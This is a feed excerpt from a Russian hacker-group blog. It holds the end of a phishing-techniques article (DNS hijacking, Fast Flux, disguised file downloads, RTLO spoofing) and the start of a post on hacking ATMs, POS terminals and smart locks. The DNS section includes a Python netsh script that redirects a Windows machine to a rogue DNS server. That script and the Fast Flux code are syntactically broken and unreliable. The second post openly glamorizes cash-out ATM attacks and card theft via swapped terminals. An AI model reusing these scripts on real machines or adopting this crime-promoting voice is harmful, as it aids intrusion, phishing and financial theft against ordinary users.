    &lt;li id=&quot;bG3C&quot;&gt;Получение и проверка репутации для 1000 недавно просроченных доменов:&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre data-lang=&quot;bash&quot; id=&quot;eOT9&quot;&gt;python3 ./domainhunter.py -r 1000&lt;/pre&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;CgD3&quot; data-align=&quot;center&quot;&gt;14. Перенаправление DNS&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;7Van&quot;&gt;&lt;strong&gt;DNS Hijacking&lt;/strong&gt;, также известный как &lt;strong&gt;DNS-перенаправление&lt;/strong&gt;, представляет собой технику манипуляции процессом разрешения доменных имен. Злоумышленники могут вмешиваться в процесс преобразования доменных имен в IP-адреса, перенаправляя трафик на вредоносные сайты, блокируя доступ к легитимным ресурсам или перехватывая и изменяя сетевой трафик. Этот метод часто используется в фишинговых атаках для обмана пользователей, перенаправляя их на мошеннические сайты, которые выглядят как легитимные.&lt;/p&gt;
  &lt;p id=&quot;muJk&quot;&gt;&lt;strong&gt;1. Перенаправление на поддельные DNS-серверы&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;i5Mn&quot;&gt;
    &lt;li id=&quot;zg5Z&quot;&gt;Злоумышленники могут настроить вредоносное ПО для изменения настроек DNS на компьютере жертвы, чтобы использовать поддельный DNS-сервер, который они контролируют. Этот сервер затем перенаправляет запросы на вредоносные сайты, имитирующие легитимные.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;blockquote id=&quot;KBQA&quot;&gt;Пример: Когда пользователь пытается зайти на bank.com, поддельный DNS-сервер может направить его на фишинговый сайт, который выглядит как настоящий сайт банка.&lt;/blockquote&gt;
  &lt;p id=&quot;cniw&quot;&gt;&lt;strong&gt;2. Компрометация доверенных DNS-серверов&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;mucu&quot;&gt;
    &lt;li id=&quot;NZKm&quot;&gt;Злоумышленники также могут взломать или использовать уязвимости доверенных DNS-серверов, чтобы изменить ответы, которые они предоставляют. Это может включать инъекцию вредоносных записей в DNS-кэш или изменение DNS-записей.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;blockquote id=&quot;Tb4a&quot;&gt;Пример: Атакующий может изменить запись DNS для paypal.com, чтобы она указывала на фишинговый сайт вместо настоящего сайта PayPal.&lt;/blockquote&gt;
  &lt;p id=&quot;IA0D&quot;&gt;&lt;strong&gt;3. Атаки «человек посередине» (MITM)&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;GVoK&quot;&gt;
    &lt;li id=&quot;AWE3&quot;&gt;Перенаправляя DNS-запросы на сервер, который они контролируют, злоумышленники могут перехватывать и изменять веб-трафик между пользователями и целевыми сайтами. Это может привести к краже данных или дополнительным фишинговым атакам.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;jNYl&quot;&gt;&lt;strong&gt;4. Манипуляция со стороны провайдера или DNS-поставщика&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;4awG&quot;&gt;
    &lt;li id=&quot;avQi&quot;&gt;Иногда интернет-провайдеры или поставщики DNS могут перенаправлять пользователей на свои собственные серверы для показа рекламы или других целей. Хотя это менее злонамеренно, чем настоящий DNS-перехват, это может повлиять на пользовательский опыт и конфиденциальность.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3 id=&quot;r5CU&quot;&gt;&lt;strong&gt; Влияние на фишинг&lt;/strong&gt;&lt;/h3&gt;
  &lt;ul id=&quot;IwZW&quot;&gt;
    &lt;li id=&quot;Me2Q&quot;&gt;&lt;strong&gt;Обманчивые сайты: &lt;/strong&gt;DNS-перехват позволяет злоумышленникам создавать фишинговые сайты, которые выглядят идентично легитимным, обманывая пользователей и заставляя их вводить конфиденциальную информацию, такую как логины и пароли.&lt;/li&gt;
    &lt;li id=&quot;0qPK&quot;&gt;&lt;strong&gt;Кража учетных данных: &lt;/strong&gt;Перенаправляя пользователей на фальшивые страницы входа, злоумышленники могут похищать имена пользователей, пароли и другую личную информацию.&lt;/li&gt;
    &lt;li id=&quot;XY61&quot;&gt;&lt;strong&gt;Социальная инженерия:&lt;/strong&gt; Злоумышленники могут использовать перехваченные домены для рассылки фишинговых писем с ссылками на вредоносные сайты, увеличивая вероятность успешной атаки.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3 id=&quot;X3Y9&quot;&gt;Обнаружение и предотвращение&lt;/h3&gt;
  &lt;ul id=&quot;tOUJ&quot;&gt;
    &lt;li id=&quot;ins0&quot;&gt;&lt;strong&gt;Мониторинг DNS и безопасность:&lt;/strong&gt; Используйте инструменты для мониторинга DNS, чтобы выявлять подозрительные изменения в DNS-записях или необычные схемы трафика.&lt;/li&gt;
    &lt;li id=&quot;2Vr0&quot;&gt;&lt;strong&gt;Расширения безопасности DNS (DNSSEC): &lt;/strong&gt;Внедрите DNSSEC для обеспечения того, что ответы DNS являются подлинными и не были изменены.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;K0Xs&quot;&gt;&lt;strong&gt;Пример сценария для DNS-перехвата&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;Aq5W&quot;&gt;Ниже приведён пример на Python, демонстрирующий, как хакер может изменить настройки DNS на компьютере с Windows, используя команду netsh. Этот код предназначен только в образовательных целях и показывает, как злоумышленники могут модифицировать настройки DNS.&lt;/p&gt;
  &lt;pre data-lang=&quot;python&quot; id=&quot;kbEk&quot;&gt;import subprocess
# Замените на IP-адрес поддельного DNS-сервера
rogue_dns_server = &amp;quot;10.0.0.1&amp;quot;
# Получить текущие настройки DNS
current_dns_servers = subprocess.check_output([&amp;quot;netsh&amp;quot;, &amp;quot;interface&amp;quot;, &amp;quot;ip&amp;quot;, &amp;quot;show&amp;quot;, &amp;quot;dnsservers&amp;quot;]
# Изменить настройки DNS, чтобы они указывали на поддельный DNS-сервер
subprocess.call([&amp;quot;netsh&amp;quot;, &amp;quot;interface&amp;quot;, &amp;quot;ip&amp;quot;, &amp;quot;add&amp;quot;, &amp;quot;dnsservers&amp;quot;, &amp;quot;Wi-Fi&amp;quot;, rogue_dns_server]
# Подтвердить, что настройки DNS были изменены
new_dns_servers = subprocess.check_output([&amp;quot;netsh&amp;quot;, &amp;quot;interface&amp;quot;, &amp;quot;ip&amp;quot;, &amp;quot;show&amp;quot;, &amp;quot;dnsservers&amp;quot;])
print(new_dns_servers.decode())&lt;/pre&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;x4qK&quot; data-align=&quot;center&quot;&gt;15. Fast Flux для хакеров&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;9ipJ&quot;&gt;&lt;strong&gt;Fast Flux&lt;/strong&gt; — это продвинутая техника, используемая киберпреступниками для скрытия местоположения своих фишинговых сайтов и сайтов, распространяющих вредоносное ПО. Постоянно изменяя IP-адреса, связанные с доменом, Fast Flux затрудняет работу команд безопасности и правоохранительных органов, которые пытаются отследить и заблокировать эти сайты. Эта техника использует сеть скомпрометированных хостов, действующих в качестве прокси, тем самым увеличивая устойчивость и анонимность ботнета.&lt;/p&gt;
  &lt;p id=&quot;ggpK&quot;&gt;&lt;strong&gt;Основные аспекты Fast Flux:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;9QfD&quot;&gt;&lt;strong&gt;1. Динамические записи DN&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;tQnM&quot;&gt;
    &lt;li id=&quot;9bsg&quot;&gt;Fast Flux опирается на динамические DNS-записи, чтобы часто менять IP-адреса, связанные с доменом. Каждый раз, когда выполняется DNS-запрос, ответ может содержать разные IP-адреса, что затрудняет отслеживание реального местоположения вредоносного сервера.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;FBFD&quot;&gt;&lt;strong&gt;2. Ботнет из скомпрометированных хостов&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;46YO&quot;&gt;
    &lt;li id=&quot;RMm9&quot;&gt;Эта техника использует большую сеть заражённых компьютеров, которые действуют в качестве прокси. Эти скомпрометированные хосты непрерывно добавляются и удаляются из DNS-записей, что обеспечивает быструю смену IP-адресов.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;NipG&quot;&gt;&lt;strong&gt;3. Сети Peer-to-Peer (P2P) &lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;SNKz&quot;&gt;
    &lt;li id=&quot;WgSH&quot;&gt;Fast Flux можно комбинировать с P2P-сетями, где узлы ботнета общаются напрямую друг с другом. Это усложняет отслеживание и разрушение сети.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;GbBl&quot;&gt;&lt;strong&gt;4. Распределённое управление и контроль (C2)&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;0Pva&quot;&gt;
    &lt;li id=&quot;s6MD&quot;&gt;Распределение инфраструктуры C2 (Command and Control) на многие узлы повышает устойчивость ботнета. Даже если один узел будет отключен, другие продолжают работать, поддерживая контроль над скомпрометированными хостами и фишинговыми операциями.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;Jeg7&quot;&gt;&lt;strong&gt;5. Веб-балансировка нагрузки&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;p8ey&quot;&gt;
    &lt;li id=&quot;yiOK&quot;&gt;Fast Flux часто использует балансировку нагрузки через веб-прокси, распределяя трафик между несколькими прокси-серверами. Это затрудняет блокировку или фильтрацию вредоносного трафика, поскольку IP-адреса и конечные точки постоянно меняются.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;AKIu&quot;&gt;&lt;strong&gt;6. Прокси-перенаправление&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;qt4u&quot;&gt;
    &lt;li id=&quot;8JdD&quot;&gt;Вредоносные сайты, использующие Fast Flux, часто перенаправляют пользователей через несколько прокси-серверов, что ещё больше затрудняет определение истинного местоположения сервера, распространяющего вредоносное ПО или фишинг.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;YoET&quot;&gt;&lt;strong&gt;Пример сценария симуляции Fast Flux&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;Qedb&quot;&gt;Ниже приведен фрагмент кода на Python, который демонстрирует упрощённую симуляцию работы DNS-сервера с использованием Fast Flux. В этом примере сервер DNS возвращает несколько IP-адресов для данного домена, используя библиотеки &lt;code&gt;dnslib&lt;/code&gt; и &lt;code&gt;socket&lt;/code&gt;.&lt;/p&gt;
  &lt;pre data-lang=&quot;python&quot; id=&quot;Grza&quot;&gt;import dnslib
import socket
# IP-адрес DNS-сервера (замените на нужный)
dns_server = &amp;quot;8.8.8.8&amp;quot;
# Доменное имя, которое вы контролируете
domain_name = &amp;quot;example.com&amp;quot;
# IP-адреса скомпрометированных хостов, которые будут действовать как прокси
proxy_addresses = [&amp;quot;10.0.0.1&amp;quot;, &amp;quot;10.0.0.2&amp;quot;, &amp;quot;10.0.0.3&amp;quot;]
# Создание DNS-запроса для доменного имени
query = dnslib.DNSRecord.question(domain_name)
# Отправка DNS-запроса на DNS-сервер
dns_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
dns_socket.sendto(query.pack(), (dns_server, 53))
# Получение ответа DNS от DNS-сервера
response = dnslib.DNSRecord.parse(dns_socket.recv(4096))
# Изменение DNS-ответа, чтобы включить IP-адреса скомпрометированных хостов
response.add_answer(*dnslib.RR.fromZone(f&amp;quot;{domain_name} A &amp;quot; + &amp;quot; &amp;quot;.join(proxy_addresses)))
# Симуляция отправки измененного DNS-ответа обратно клиенту (требуется реальный адрес клиента и порт)
client_address = (&amp;quot;client_ip&amp;quot;, 12345)  # Замените на реальный адрес и порт клиента
dns_socket.sendto(response.pack(), client_address)&lt;/pre&gt;
  &lt;p id=&quot;aKeJ&quot;&gt;&lt;strong&gt;Как это работает:&lt;/strong&gt;&lt;/p&gt;
  &lt;ol id=&quot;VROF&quot;&gt;
    &lt;li id=&quot;sFfb&quot;&gt;&lt;strong&gt;Создание запроса DNS: &lt;/strong&gt;Скрипт отправляет DNS-запрос на DNS-сервер для определенного домена.&lt;/li&gt;
    &lt;li id=&quot;R5FP&quot;&gt;&lt;strong&gt;Получение ответа DNS: &lt;/strong&gt;Полученный ответ перехватывается.&lt;/li&gt;
    &lt;li id=&quot;OKk5&quot;&gt;&lt;strong&gt;Изменение ответа:&lt;/strong&gt; Ответ модифицируется, добавляя несколько IP-адресов (скомпрометированных хостов) для домена, чтобы симулировать работу Fast Flux.&lt;/li&gt;
    &lt;li id=&quot;dc0m&quot;&gt;&lt;strong&gt;Отправка клиенту:&lt;/strong&gt; После модификации ответ отправляется обратно клиенту.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;kaSK&quot; data-align=&quot;center&quot;&gt;16. Загрузка &amp;quot;доверенного&amp;quot; файла&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;rmMJ&quot;&gt;&lt;strong&gt;Загрузка &amp;quot;доверенного&amp;quot; файла&lt;/strong&gt; — это сложная техника фишинга, при которой злоумышленники используют легитимные сервисы или сайты для распространения вредоносных файлов. Эта методика основана на обмане пользователей, заставляя их загружать файлы, которые кажутся безопасными и исходят из надежного источника, но на самом деле предназначены для компрометации их систем.&lt;/p&gt;
  &lt;h3 id=&quot;X3tK&quot;&gt;&lt;strong&gt;Основные этапы атаки:&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;JKgN&quot;&gt;&lt;strong&gt;1. Эксплуатация доверенных источников&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;WRSs&quot;&gt;
    &lt;li id=&quot;3nYr&quot;&gt;Злоумышленники могут использовать скомпрометированные или легитимные веб-сайты для хостинга или ссылки на вредоносные файлы. Эти сайты часто являются доверенными для жертвы, что делает фишинговую атаку менее подозрительной. Использование доверенного источника снижает риск того, что пользователь насторожится и откажется загружать файл.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;Purp&quot;&gt;&lt;strong&gt;2. Обфускация и ложная информация&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;5xtt&quot;&gt;
    &lt;li id=&quot;hIEx&quot;&gt;Вредоносный файл обычно замаскирован под легитимный документ, например, PDF, Word или исполняемый файл. Файл может содержать макросы, скрипты или другие типы вредоносного ПО, которые используют уязвимости в системе жертвы. Файл может быть назван или представлен так, чтобы соответствовать контексту, в котором работает жертва, что повышает вероятность открытия файла.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;wTGy&quot;&gt;&lt;strong&gt;3. Механизм доставки&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;QEdg&quot;&gt;
    &lt;li id=&quot;26RM&quot;&gt;Вредоносный файл обычно доставляется через вложения в электронных письмах, ссылки в фишинговых письмах или через скомпрометированные легитимные сайты. Фишинговое письмо или сообщение часто содержит убедительное содержание, побуждающее пользователя загрузить и открыть файл. Например, это может быть ложное уведомление от службы поддержки или предложение скачать обновление программного обеспечения.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;pzRF&quot;&gt;&lt;strong&gt;4. Выполнение и полезная нагрузка&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;YbB7&quot;&gt;
    &lt;li id=&quot;zue6&quot;&gt;После того как пользователь загружает и открывает файл, он может выполнить вредоносный код, который крадет учетные данные, устанавливает дополнительное вредоносное ПО или эксплуатирует уязвимости системы. В зависимости от типа атаки, это может привести к краже личных данных, удалённому управлению устройством или установке троянов для дальнейших атак.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3 id=&quot;tCAv&quot;&gt;Как защититься от Reflective File Download:&lt;/h3&gt;
  &lt;ol id=&quot;KxoO&quot;&gt;
    &lt;li id=&quot;eIIh&quot;&gt;Будьте бдительны при работе с вложениями и ссылками, даже если они исходят от доверенных источников.&lt;/li&gt;
    &lt;li id=&quot;QZy3&quot;&gt;Используйте антивирусные программы и расширенные фильтры электронной почты для обнаружения и блокировки подозрительных вложений.&lt;/li&gt;
    &lt;li id=&quot;9snG&quot;&gt;Ограничьте использование макросов в документах и регулярно обновляйте программы для устранения уязвимостей.&lt;/li&gt;
    &lt;li id=&quot;AwGO&quot;&gt;Проверяйте подлинность источника загрузки файлов, особенно если файл предлагается для скачивания неожиданным образом.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;blockquote id=&quot;hD9G&quot;&gt;Эта техника сложна, потому что она использует доверие к легитимным источникам и замаскированные вредоносные файлы, что затрудняет их обнаружение пользователями и даже системами безопасности.&lt;/blockquote&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;U3Vt&quot; data-align=&quot;center&quot;&gt;17. Символы RTLO в фишинге&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;xTGo&quot;&gt;&lt;strong&gt;RTLO (Right-to-Left Override) атаки&lt;/strong&gt; — это техника, использующая символы управления Unicode для обмана пользователей и маскировки истинной природы вредоносных файлов или ссылок. RTLO особенно опасен в фишинговых атаках, поскольку он меняет направление текста, делая имена файлов или URL-адресов кажущимися безопасными.&lt;/p&gt;
  &lt;h3 id=&quot;1b4f&quot;&gt;Что такое RTLO?&lt;/h3&gt;
  &lt;p id=&quot;Zqnr&quot;&gt;&lt;strong&gt;RTLO (Right-to-Left Override) &lt;/strong&gt;— это управляющий символ Unicode, используемый для изменения направления текста. Он применяется в языках, которые пишутся справа налево, таких как арабский и иврит, и его цель — изменить направление отображения символов, идущих после него.&lt;/p&gt;
  &lt;p id=&quot;YwQi&quot;&gt;&lt;strong&gt;Значение Unicode:&lt;/strong&gt; U+202E&lt;/p&gt;
  &lt;p id=&quot;l2iX&quot;&gt;&lt;strong&gt;Функция: &lt;/strong&gt;Меняет направление последующего текста с левого направо на правый налево.&lt;/p&gt;
  &lt;h3 id=&quot;Ubt5&quot;&gt;Как RTLO используется в фишинге&lt;/h3&gt;
  &lt;blockquote id=&quot;DKix&quot;&gt;Злоумышленники могут использовать RTLO-символ для маскировки истинной природы файлов, URL-адресов или email-адресов, что затрудняет их обнаружение пользователями или системами безопасности.&lt;/blockquote&gt;
  &lt;p id=&quot;xLMU&quot;&gt;&lt;strong&gt;Маскировка расширений файлов:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;zwPc&quot;&gt;Злоумышленники могут вставить RTLO перед расширением файла, чтобы изменить его видимый формат и обманом заставить пользователя подумать, что файл безопасен.&lt;/p&gt;
  &lt;p id=&quot;3VyK&quot;&gt;&lt;strong&gt;Пример:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;ZpDi&quot;&gt;
    &lt;li id=&quot;07M0&quot;&gt;Оригинальный файл: document.exe (исполняемый файл)&lt;/li&gt;
    &lt;li id=&quot;34ty&quot;&gt;Обфусцированный файл с RTLO: document pdf.exe&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;SPhA&quot;&gt;В результате файл может выглядеть как document.pdf, что введет пользователя в заблуждение и повысит вероятность открытия вредоносного исполняемого файла.&lt;/p&gt;
  &lt;p id=&quot;SPhA&quot;&gt;&lt;strong&gt;Обманчивые URL-адреса:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;D7Cn&quot;&gt;Атаки с использованием RTLO могут изменять внешний вид URL, создавая видимость того, что они ведут на безопасные сайты.&lt;/p&gt;
  &lt;p id=&quot;27vD&quot;&gt;&lt;strong&gt;Пример:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;UKfP&quot;&gt;
    &lt;li id=&quot;UPZG&quot;&gt;Оригинальный URL: http://malicious.com/bank-login&lt;/li&gt;
    &lt;li id=&quot;0zBo&quot;&gt;Обфусцированный URL с RTLO: http://bank-login moc.suoicilam.com&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;jqjg&quot;&gt;Визуально этот URL выглядит как http://bank-login.com, хотя фактически перенаправляет пользователя на malicious.com&lt;/p&gt;
  &lt;p id=&quot;jqjg&quot;&gt;&lt;strong&gt;Маскировка email-адресов:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;h9a3&quot;&gt;RTLO может быть использован для создания обманчивых email-адресов, которые кажутся легитимными, но направляют на вредоносный адрес.&lt;/p&gt;
  &lt;p id=&quot;Bylo&quot;&gt;&lt;strong&gt;Пример:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;lBWU&quot;&gt;
    &lt;li id=&quot;qOXI&quot;&gt;Оригинальный адрес: support moc.knabyruoy@&lt;/li&gt;
    &lt;li id=&quot;l3z8&quot;&gt;Адрес выглядит как &lt;code&gt;support@yourbank.com&lt;/code&gt;, но фактически является обманчивым и направлен на другой домен.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;iODP&quot;&gt;Злоумышленник может использовать RTLO для создания ложного ощущения безопасности, чтобы обмануть пользователя и заставить его перейти по вредоносной ссылке.&lt;/p&gt;
  &lt;h3 id=&quot;zOYQ&quot;&gt;Как защититься от атак с использованием RTLO:&lt;/h3&gt;
  &lt;ol id=&quot;SkdX&quot;&gt;
    &lt;li id=&quot;t6Oi&quot;&gt;Внимательность: Всегда обращайте внимание на необычные символы в именах файлов, особенно если они имеют неожиданные расширения.&lt;/li&gt;
    &lt;li id=&quot;1M6G&quot;&gt;Просмотр полного пути файла: Перед открытием файлов проверяйте их полный путь и расширение через свойства файла.&lt;/li&gt;
    &lt;li id=&quot;urvD&quot;&gt;Использование антивирусов и фильтров: Современные антивирусные программы и фильтры могут обнаружить использование RTLO и предупредить пользователя о подозрительных файлах или ссылках.&lt;/li&gt;
    &lt;li id=&quot;hlxD&quot;&gt;Отключение макросов: Важно отключить выполнение макросов в документах, полученных из неизвестных источников.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;nIc0&quot;&gt;RTLO-символы могут быть мощным инструментом для маскировки вредоносных файлов и ссылок, делая их на первый взгляд безопасными, но при правильных мерах предосторожности эти атаки можно обнаружить и предотвратить.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;p8HF&quot; data-align=&quot;center&quot;&gt;18. Полезные плюшки для работы с фишингом&lt;/h2&gt;
  &lt;/section&gt;
  &lt;p id=&quot;d4hF&quot;&gt;&lt;strong&gt;Примеры фишинговых писем различных группировок:&lt;/strong&gt;&lt;br /&gt;&lt;a href=&quot;https://github.com/wddadk/Phishing-campaigns&quot; target=&quot;_blank&quot;&gt;https://github.com/wddadk/Phishing-campaigns&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;Sx64&quot;&gt;&lt;strong&gt;Обход двухфакторной аутентификации с помощью фишинга и OTP-ботов:&lt;/strong&gt;&lt;br /&gt;&lt;a href=&quot;https://securelist.ru/2fa-phishing/109677/&quot; target=&quot;_blank&quot;&gt;https://securelist.ru/2fa-phishing/109677/&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;T3Rj&quot;&gt;&lt;strong&gt;Использование досок объявлений в фишинге:&lt;/strong&gt;&lt;br /&gt;&lt;a href=&quot;https://securelist.ru/message-board-scam/109548/&quot; target=&quot;_blank&quot;&gt;https://securelist.ru/message-board-scam/109548/&lt;/a&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;72M7&quot;&gt;Наш канал: &lt;a href=&quot;https://t.me/+eATHVyrDVPUwYzk8&quot; target=&quot;_blank&quot;&gt;https://t.me/+eATHVyrDVPUwYzk8&lt;/a&gt;&lt;br /&gt;Наш чат: &lt;a href=&quot;https://t.me/+hDPQsUT7YEljNzc8&quot; target=&quot;_blank&quot;&gt;https://t.me/+hDPQsUT7YEljNzc8&lt;/a&gt;&lt;/p&gt;

</content></entry><entry><id>parabellum_clan:Hacking_physical_devices</id><link rel="alternate" type="text/html" href="https://teletype.in/@parabellum_clan/Hacking_physical_devices?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=parabellum_clan"></link><title>Взлом физических устройств: от банкоматов до умных колонок</title><published>2025-06-17T09:29:56.401Z</published><updated>2025-06-17T09:29:56.401Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img3.teletype.in/files/e4/ce/e4ceb9d5-3b75-49e6-a7ef-9601f33b9de5.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img4.teletype.in/files/31/4c/314cce5d-eeee-4f05-974c-0269bf96323a.jpeg&quot;&gt;Доброго дня, дамы и господа, с вами, как и всегда, Parabellum Clan! Каждый из вас, думаю, хотел, чтобы можно было взломать банкомат и вам посыпались бы деньги, или переключить сигнал светофора во время погони, как в Watch Dogs, (спойлер: невозможно), но а сегодня мы расскажем, покажем, и приведём примеры того, как это происходит на самом деле!</summary><content type="html">
  &lt;figure id=&quot;C67j&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/31/4c/314cce5d-eeee-4f05-974c-0269bf96323a.jpeg&quot; width=&quot;3072&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;seXi&quot;&gt;Доброго дня, дамы и господа, с вами, как и всегда, &lt;a href=&quot;https://t.me/+C5nDxzccleljMjc0&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Parabellum Clan&lt;/strong&gt;&lt;/a&gt;! Каждый из вас, думаю, хотел, чтобы можно было взломать банкомат и вам посыпались бы деньги, или переключить сигнал светофора во время погони, как в &lt;a href=&quot;https://ru.wikipedia.org/wiki/Watch_Dogs&quot; target=&quot;_blank&quot;&gt;Watch Dogs&lt;/a&gt;, (спойлер: невозможно), но а сегодня мы расскажем, покажем, и приведём примеры того, как это происходит на самом деле!&lt;/p&gt;
  &lt;p id=&quot;nMpZ&quot;&gt;&lt;strong&gt;Содержание:&lt;/strong&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/JRBioZ9O82h#9Y8d&quot;&gt;1. Физический взлом и цифровой: различия и сходства&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/JRBioZ9O82h#zOhC&quot;&gt;2. Как взломать банкомат и стать богатым&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/JRBioZ9O82h#YmMH&quot;&gt;3. POS-терминалы под прицелом: укради, если сможешь&lt;/a&gt;&lt;a href=&quot;/@parabellumclan/JRBioZ9O82h#gHsc&quot;&gt;4. Куда уехала моя машинка?&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/JRBioZ9O82h#fetU&quot;&gt;5. Взломай свой дом: умные замки и дурацкие ошибки&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/JRBioZ9O82h#5bPQ&quot;&gt;6. Голосовые ассистенты на службе хакера&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;/@parabellumclan/JRBioZ9O82h#IVT3&quot;&gt;7. Город под контролем: взлом инфраструктуры и систем безопасности&lt;/a&gt;&lt;/p&gt;
  &lt;hr /&gt;
  &lt;section style=&quot;background-color:hsl(hsl(263, 48%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;h2 id=&quot;9Y8d&quot; data-align=&quot;center&quot;&gt;1. Физический взлом и цифровой: различия и сходства&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;cZCO&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/1f/d3/1fd33eb0-af3c-494a-bdf1-37698444054e.jpeg&quot; width=&quot;3072&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Gowp&quot;&gt;Если ты здесь, то явно понимаешь, что мир — это не просто бинарный код, а настоящая песочница возможностей, где можно взять от жизни всё. Сегодня поговорим о двух наших главных инструментах — физическом и цифровом взломе. Ты можешь думать, что физический взлом — это про двери и замки, а цифровой — про код и клавиатуру. Но реальность куда сложнее. Эти два мира тесно переплетаются, создавая мощную синергию&lt;/p&gt;
  &lt;p id=&quot;VwkR&quot;&gt;&lt;strong&gt;Физический взлом&lt;/strong&gt; — это когда ты не просто сидишь за компом, а делаешь что-то реальное. Когда ты подходишь к банкомату и заставляешь его выплёвывать наличку, как под гипнозом. Это про контроль над вещами, над железом, над реальностью, которую система хочет спрятать за стеной безопасности.&lt;/p&gt;
  &lt;ul id=&quot;AC83&quot;&gt;
    &lt;li id=&quot;2RCH&quot;&gt;&lt;strong&gt;Банкоматы на подкорке:&lt;/strong&gt; Подходишь к машине, будто ты её техподдержка, а на деле — внедряешь своё ПО, чтобы за пару минут она раздавала деньги. Тебе не нужно ничего, кроме нужного устройства и капли наглости.&lt;/li&gt;
    &lt;li id=&quot;10y6&quot;&gt;&lt;strong&gt;POS-терминалы — плевое дело:&lt;/strong&gt; Замени настоящий терминал на свой, модифицированный. Дальше всё просто — данные карт льются рекой, а деньги текут на твои анонимные счета.&lt;/li&gt;
    &lt;li id=&quot;ttAI&quot;&gt;&lt;strong&gt;Умные замки? Пфф, смешно:&lt;/strong&gt; Если кто-то думает, что замки, которые подключены к Wi-Fi, спасут его от взлома, то он ошибается. Пара кликов, и дверь открывается как по волшебству. Система безопасности? Звучит как плохая шутка&lt;/li&gt;
  &lt;/ul&gt;
